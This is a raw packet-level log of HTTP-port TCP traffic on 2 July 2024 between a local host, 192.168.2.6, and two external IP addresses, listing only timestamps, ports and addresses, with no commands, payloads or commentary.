Jul 2, 2024 00:05:06.882709980 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.882742882 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.882770061 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.883375883 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.883449078 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.883460045 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.883486986 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.883500099 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.883562088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.883620024 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.884032011 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.884061098 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.884071112 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.884109020 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.884135008 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.906712055 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.906785965 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.906793118 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.906796932 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.906827927 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.906831980 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.906840086 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.906867027 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.906894922 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.907008886 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.907037020 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.907048941 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.907057047 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.907079935 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.907094955 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.907124996 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.907138109 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.907169104 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.907828093 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.907870054 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.907887936 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.907898903 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.907926083 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.907937050 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.921192884 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.921211958 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.921222925 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.921256065 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.921310902 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.921314001 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.921325922 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.921390057 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.921463013 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.921513081 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.921524048 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.921574116 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.921680927 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.921737909 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.921772003 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.921783924 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.921792984 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.921803951 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.921823025 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.921875000 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.922168970 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.922200918 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.922210932 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.922218084 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.922252893 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.922252893 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.922414064 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.922467947 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.922475100 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.922486067 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.922549963 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.922585964 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.922596931 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.922607899 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.922617912 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.922632933 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.922650099 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.922730923 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.922744036 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.922796965 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.923377991 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.923413038 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.923424006 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.923453093 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.923453093 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.923588037 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.923599005 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.923609972 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.923620939 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.923654079 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.923654079 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.923722029 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.923732996 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.923794985 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.924387932 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.924429893 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.924437046 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.924448013 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.924475908 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.924494028 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.924587965 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.924599886 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.924608946 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.924622059 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.924658060 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.924659014 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.924690962 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.924702883 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.924778938 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.925385952 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.925447941 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.925458908 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.925494909 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.925497055 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.925497055 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.925512075 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.925528049 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.925538063 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.925545931 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.925575972 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.925611019 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.995876074 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.995896101 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.995907068 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.995918036 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.995945930 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.995959044 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.995970964 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.996097088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996108055 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996119976 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996129990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996140957 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996151924 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996211052 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.996211052 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.996211052 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.996211052 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.996364117 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996403933 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.996403933 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.996515989 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996527910 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996539116 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996550083 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996560097 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996570110 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996578932 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.996578932 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.996579885 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996591091 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996601105 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996611118 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996611118 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.996622086 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996632099 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996644974 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.996644974 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.996675014 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.996851921 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996861935 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996871948 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996902943 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.996928930 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.996948004 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.996999979 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.997095108 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997118950 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997129917 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997139931 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997152090 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.997155905 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997172117 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997183084 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997184038 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.997193098 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997195959 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.997199059 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997209072 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997219086 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997220993 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.997229099 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997240067 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997255087 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.997263908 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997275114 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997284889 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997284889 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.997284889 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.997294903 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997307062 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997317076 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997319937 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.997344971 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.997381926 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.997872114 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:07.997883081 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.997910976 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.997920990 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.997925043 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:07.997931004 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.997941971 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.997951984 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.997955084 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.997962952 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.997975111 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.997975111 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.997984886 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.997997046 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998006105 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998013020 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.998013020 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.998017073 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998029947 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998029947 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.998050928 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.998095989 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.998439074 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998507023 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.998579025 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998590946 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998600960 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998610973 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998620987 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998631001 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998635054 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.998641968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998644114 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.998652935 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998663902 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998673916 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998692989 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998701096 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.998701096 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.998706102 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998717070 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998727083 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998740911 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998750925 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998755932 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.998755932 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.998764992 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998775959 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998785973 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998791933 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.998796940 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998807907 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998819113 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.998819113 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.998830080 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.998867989 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.999439955 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999452114 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999461889 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999474049 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999484062 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999494076 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999504089 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999512911 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.999512911 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.999515057 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999527931 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.999536991 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999547958 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999558926 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999567986 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.999569893 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999582052 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999587059 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.999593973 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999605894 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999613047 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.999617100 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999620914 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.999629021 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999639988 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999650002 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999660015 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999670029 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999680042 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:07.999686956 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.999686956 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.999711990 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:07.999733925 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.000272036 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000283957 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000293016 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000303984 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000313997 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000323057 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.000327110 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000363111 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.000396013 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.000456095 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000467062 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000477076 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000500917 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000508070 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.000511885 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000526905 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000535965 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.000539064 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000550985 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000559092 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.000561953 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000574112 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000582933 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000585079 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.000595093 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000606060 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000616074 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000621080 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.000621080 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.000627041 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000638962 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000648022 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.000682116 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.000682116 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.000695944 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.001260042 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.001271963 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.001281023 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.001292944 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001302004 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.001312017 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001322031 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001332045 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001336098 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.001338959 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.001338959 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.001341105 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001352072 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001363039 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001372099 CEST	80	49716	77.105.133.27	192.168.2.6
